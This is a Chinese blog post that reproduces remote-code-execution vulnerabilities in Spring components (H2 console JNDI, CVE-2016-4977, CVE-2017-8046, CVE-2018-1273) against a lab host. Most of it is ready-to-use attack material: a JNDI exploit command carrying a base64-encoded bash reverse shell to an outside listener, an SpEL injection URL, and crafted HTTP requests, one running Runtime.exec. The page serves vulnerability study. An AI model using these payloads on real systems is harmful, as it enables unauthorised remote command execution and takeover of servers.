热门标签
热门文章
- 1SpringBoot线程上下文传递数据_springboot上下文存放数据
- 2Net和Java基于zipkin的全链路追踪
- 3论文解读1:DETR论文阅读和源码分析
- 4vmaware 安装chrome OS 系统教程
- 5sql server 数据库压缩备份_sqlserver压缩备份数据库
- 6C语言自学攻略_54笨鸟 c语言
- 7策略文档不完整或未更新,使得策略难以被准确执行
- 8Linux WiFi使用_linux wifi用法
- 9【AI 大模型】提示工程 ① ( 通用人工智能 和 专用人工智能 | 掌握 提示工程 的优势 | 提示工程目的 | 提示词组成、迭代、调优及示例 | 思维链 | 启用思维链的指令 | 思维链原理 )_ai提示词工程
- 10在 Linux 上给用户赋予指定目录的读写权限_linux给用户赋予文件夹读写权限
当前位置: article > 正文
spring相关漏洞复现_spring boot h2 database rce
作者:weixin_40725706 | 2024-08-08 07:25:08
赞
踩
spring boot h2 database rce
1. H2 Database web端未授权访问导致的rce
H2 Database是一个数据库,springboot如果调用了这个数据库
访问:http://192.168.171.139:8080/h2-console/
javax.naming.InitialContext
rmi://evil:23456/BypassByEL
- 1
- 2
- 3
反弹shell:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.171.1
- 1
2. Spring Security OAuth2 rce – CVE-2016-4977
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。
条件:知道认证所需的凭据
工具:Spring_OAuth2_exp.py
http://192.168.171.139:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://te123123st
- 1
用生成的字符串代替上面的233*233然后访问url即可反弹shell:
3. Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务,漏洞会导致任意用户使用SpEL表达式来进行命令执行。
反弹shell,使用Spring_OAuth2_exp.py可生成poc。用poc替换下面请求path中的123123。
PATCH /customers/1 HTTP/1.1
Host: 192.168.171.139:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 4394
[{ "op": "replace", "path": “123123/lastname", "value": "vulhub" }]
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
4. Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
在注册的时候抓包
POST /users?page=&size=5 HTTP/1.1 Host: 192.168.171.139:8080 Connection: keep-alive Content-Length: 123 Pragma: no-cache Cache-Control: no-cache Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost:8080/users?page=0&size=5 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/333333")]=&password=&repeatedPassword=
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/946827
推荐阅读
相关标签
